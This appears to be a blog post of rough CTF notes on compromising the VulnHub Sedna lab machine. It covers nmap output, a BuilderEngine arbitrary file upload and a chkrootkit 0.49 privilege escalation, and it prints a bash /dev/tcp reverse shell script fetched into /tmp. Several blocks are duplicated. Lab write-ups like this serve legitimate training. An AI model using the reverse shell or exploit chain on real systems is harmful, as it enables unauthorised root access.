Walkthru:
A. https://mendidsiren63.blogspot.com/2017/05/vulnhub-hackfest2016sedna-walkthrough.html [PUT method giving access forbidden, POSTER plugin renaming a file , exploit.html to POST a file for BuilderEngine 3.5.0 - Arbitrary File Upload vulnerability, netcat with netcat /dev/tcp, exploit 33899, ]
B. http://www.waywardpaladin.com/index.php?op=ViewArticle&articleId=3&blogId=1 [command line reverse shell, firefart or exploit 40839 but I am getting error upon compilation]
C. https://medium.com/@3wem/hackfest2016-sedna-ctf-de95f2ab0b4f [metasploit]
D. https://www.n00py.io/2017/03/vulnhub-walkthrough-hackfest2016-sedna/ [ditrycow]
Notes:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protoc ol 2.0)
53/tcp open domain ISC BIND 9.9.5-3 (Ubuntu Linux)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
110/tcp open pop3 Dovecot pop3d
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd (Ubuntu)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
995/tcp open ssl/pop3 Dovecot pop3d
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
54985/tcp open unknown
MAC Address: 08:00:27:29:F0:BD (Oracle VirtualBox virtual NIC)
A. https://mendidsiren63.blogspot.com/2017/05/vulnhub-hackfest2016sedna-walkthrough.html [PUT method giving access forbidden, POSTER plugin renaming a file , exploit.html to POST a file for BuilderEngine 3.5.0 - Arbitrary File Upload vulnerability, netcat with netcat /dev/tcp, exploit 33899, ]
B. http://www.waywardpaladin.com/index.php?op=ViewArticle&articleId=3&blogId=1 [command line reverse shell, firefart or exploit 40839 but I am getting error upon compilation]
C. https://medium.com/@3wem/hackfest2016-sedna-ctf-de95f2ab0b4f [metasploit]
D. https://www.n00py.io/2017/03/vulnhub-walkthrough-hackfest2016-sedna/ [ditrycow]
Notes:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protoc ol 2.0)
53/tcp open domain ISC BIND 9.9.5-3 (Ubuntu Linux)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
110/tcp open pop3 Dovecot pop3d
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd (Ubuntu)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
995/tcp open ssl/pop3 Dovecot pop3d
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
54985/tcp open unknown
MAC Address: 08:00:27:29:F0:BD (Oracle VirtualBox virtual NIC)
00000000000000000000000000
dirb and nikto on port 80 and 8080, found some interesting folders/files and java server pages (JSP), some giving 403 access forbidden. JSP and Coyote shows many pages but not anything signficant.
Some vulns but nothing worked. Ran smb cmds but nothing so far. Robots.txt also didnt show anything or PUT method which also showed 403 access forbidden. Tried hydra for SMB and SSH for user "victor" but nothing
Some vulns but nothing worked. Ran smb cmds but nothing so far. Robots.txt also didnt show anything or PUT method which also showed 403 access forbidden. Tried hydra for SMB and SSH for user "victor" but nothing
00000000000000000000000000
Used https://www.exploit-db.com/exploits/40390/ to upload an arbitrary file . Tried to upload a file using POSTER plugin but it would rename the file and remove the PHP extension. The exploit also has an html code that can be used to upload a reverse shell file using POST method
$ uname -a
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
$ pwd
/
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls /home
$ uname -a
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
$ pwd
/
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls /home
Tried many exploit for pric escalation but didn't work. I decided to do more enumerations I found out chkrootkit is installed on the machine. To our luck version 0.49 is installed. This was found in privledge escalation script
Searching on searchsploit we have found an exploit for chkrootkit version 0.49. As per the vulnerability chkrootkit will execute all the files with root privileges. We will now create a bash script for reverse shell and wget into "tmp" folder: 192.168.213.149 is Kali in this case
#! /bin/bash
bash -i >& /dev/tcp/192.168.213.149/445 0>&1
Once the script is ready, we will wget the script into the "tmp" directory and make it executable.
Now we will start the listener on port 445 on our attacker machine and wait for the file to execute and send the reverse shell which was after 5-15 minutes. I could run it manually but it would give me www access only
00000000000000000000000000#! /bin/bash
bash -i >& /dev/tcp/192.168.213.149/445 0>&1
Once the script is ready, we will wget the script into the "tmp" directory and make it executable.
smb_192.168.117.8.nmap
00000000000000000000000000
smb_192.168.117.8.nmap
00000000000000000000000000
smb_192.168.117.8.nmap
00000000000000000000000000
smb_192.168.117.8.nmap
00000000000000000000000000
Comments
Post a Comment